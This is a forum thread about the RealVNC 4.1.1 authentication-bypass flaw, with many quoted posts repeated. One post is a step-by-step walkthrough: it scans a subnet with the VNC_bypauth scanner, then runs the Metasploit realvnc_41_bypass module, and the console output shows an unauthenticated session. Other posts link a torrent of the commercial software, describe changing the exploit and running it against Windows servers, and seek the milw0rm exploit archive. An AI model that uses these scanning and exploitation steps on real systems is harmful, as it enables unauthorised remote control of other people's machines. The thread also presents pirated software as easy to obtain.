In doing some background research related to this (http://forums.remote-exploit.org/showthread.php?t=7421) thread, I'm looking for a copy of Real VNC 4.1.1 (Windows version). The current version on the website is 4.1.2, and 4.1.1 is not among the "previous" versions (because of the known exploit).

If I can set up a copy on my Windows box, I'll be able to validate the VNC bypass scanner included with BT2, as well as the specific Metasploit exploit.

If anyone has a copy of this please or can point me to one, please let me know.

I might have a copy. I'll let you know later tonight.

I stopped using REAL VNC a while and now I only use TightVNC.

In doing some background research related to this (http://forums.remote-exploit.org/showthread.php?t=7421) thread, I'm looking for a copy of Real VNC 4.1.1 (Windows version). The current version on the website is 4.1.2, and 4.1.1 is not among the "previous" versions (because of the known exploit).

If I can set up a copy on my Windows box, I'll be able to validate the VNC bypass scanner included with BT2, as well as the specific Metasploit exploit.

If anyone has a copy of this please or can point me to one, please let me know.

prez I'm pretty sure I at least have the viewer which is the vunerable program. I'm not sure if I have the sever . I'm on my phone but if you pm me a email address or something Ill send it to you if you still need it. the ultra vnc viewer is vunerable too.

I might have a copy. I'll let you know later tonight.

I stopped using REAL VNC a while and now I only use TightVNC.
I only use Tight VNC too (actually, I use LogMeIn almost exclusively now), but I wanted to play around with it.

http://btjunkie.org/torrent/Real-VNC-Enterprise-Edition-v4-1-9/43242f31dc3a589098bb766d79dced86139fb87490c4

Thanks for the replies guys, I have a copy now. ;)

http://btjunkie.org/torrent/Real-VNC-Enterprise-Edition-v4-1-9/43242f31dc3a589098bb766d79dced86139fb87490c4


Hmmm.... promoting illegal activities, I see ..... :rolleyes:

bt vnc # VNC_bypauth -p 5900 -i 192.168.1.1-192.168.1.255 -vnc -vv

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[linux]==

FOUND PORT IP STATUS THREADS TOTAL/REMAINING
192.168.1.113 :5900 vnc4:VULNERABLE
F:1 P:255 I:255 S:100% TH:0 0:00:00
Using the RealVNC 4.1.1 Bypass Authentication Scanner, I locate an IP running the vulnerable version.
bt ~ # cd /pentest/exploits/framework2/
bt framework2 # msfconsole
(The exploit is not available with Metasploit 3...don't know why)
msf > use realvnc_41_bypass
msf realvnc_41_bypass > set LHOST 127.0.0.1
LHOST -> 127.0.0.1
msf realvnc_41_bypass > set RHOST 192.168.1.113
RHOST -> 192.168.1.113
msf realvnc_41_bypass > exploit

Waiting for VNC connections to 127.0.0.1:5900...
Connected to RFB server, using protocol version 3.7

Proxying data between the connections...
And it's all over.

Hmmm, we use Dameware and Apple Remote desktop for all our remote viewing/fixing things at work. Looks like I'm going to have to do a little snooping/research.

Hmmm.... promoting illegal activities, I see ..... :rolleyes:

not really as the source code for the older versions of vnc viewer were available to the public

I was asking for you That I wanted exploit which had huge options
and then I would modify it as I want.

this exploit as you said is not appeared on the first page of the website.
I was looking for it and finally when I found it, the link was "out of the time."
there was in download center of purdeu.edu now I can't again find it on them site.
you can watch it on the milw0rm's site . it's too simple :

attacker modify the EXPLOIT as he/she wants and then check some site based on a windows(2003 server). finally when he finish checking site, already modified exploit will be send automatically.
that's all and then the attacker can connect using vnc's fullscrean without any password request.
and finally this port (5900.5800.5801) will open whit tcp.
someone guess whatever I wrote?
it was in the PASSIVEMODE's site but now I can't reach any file .server is still working but impossible to reach any file.
same exploit was even purdeu.net but you would register as them PDF file was discribed. but I can't register on them site.
purdeu is huge site of INDIA university, and there are some sites including other articles or structure.
someone can help me?

I was asking for you That I wanted exploit which had huge options
and then I would modify it as I want.

this exploit as you said is not previed into the first page of the website.
I was looking for it and finally when I found it, the link was "out of the time."
there was in download center of purdeu.edu now I can't again find it in them site.
you can watch it on the milw0rm's site . it's too simple :

attacker modify the EXPLOIT as he/she wants and then check some site based on a windows(2003 server). finally when he finish checking site, already modified exploit will be send automatically.
that's all and then the attacker can connect using vnc's fullscrean without any password request.
and finally this port (5900.5800.5801) will open whit tcp.
someone guess whatever I wrote?
it was in the PASSIVEMODE's site but now I can't reach any file .server is still working but impossible to reach any file.
same exploit was even purdeu.net but you would register as them PDF file was discribed. but I can't register on them site.
purdeu is huge site of INDIA university, and there are some site indended other articles or structure.
someone can help me?
I have no clue whatsoever about what you just said.

There is nothing to download. The exploit is already contained within Metasploit v2.7.

For the record, Purdue is in Indiana, not India, and is not part of any other university, but a full-fledged university by itself.

Thanks theprez98,

This is a very good proof of concept that should be somewhat safe to show here considering anyone who uses Real VNC more than likely has updated since this was discovered.

Thanks theprez98,

This is a very good proof of concept that should be somewhat safe to show here considering anyone who uses Real VNC more than likely has updated since this was discovered.
In addition, its a very simple tutorial on using Metasploit as well. It works just as easy with the web interface. Even though there is already such a video, I may make a short video of it just for fun.

In addition, its a very simple tutorial on using Metasploit as well. It works just as easy with the web interface. Even though there is already such a video, I may make a short video of it just for fun.

Please do prez, I'm XTREM-ly curious about your skills involving -=Xploitz=- in general. :cool:

BTW... @ Everyone else..

I got first dibs on seeing this video first! ;)

look this:fresh.t-systems-sfr.com/cgi-bin/warex?unix/src/misc/vnc-4_1_2-unixsrc.tar
this is second version of them. but there is too many error.
The attacker was working in BT1 but I wasn't able to send already modified exploit. :(
I have writen milw0rms founder about this exploit and he replyed me:

Hey brotha,

Just view source and look for the string str0ke213 :) That should get
you the url.

/str0ke

i couldn't find ant string file.it was only on milw0rm.com/sploits/05162006-BL4CK-vncviewer-authbypass.rar
-----------------
can someone find string line/

olso there are many error.
one of them is VNCviewer, it doesn't works perfectlly.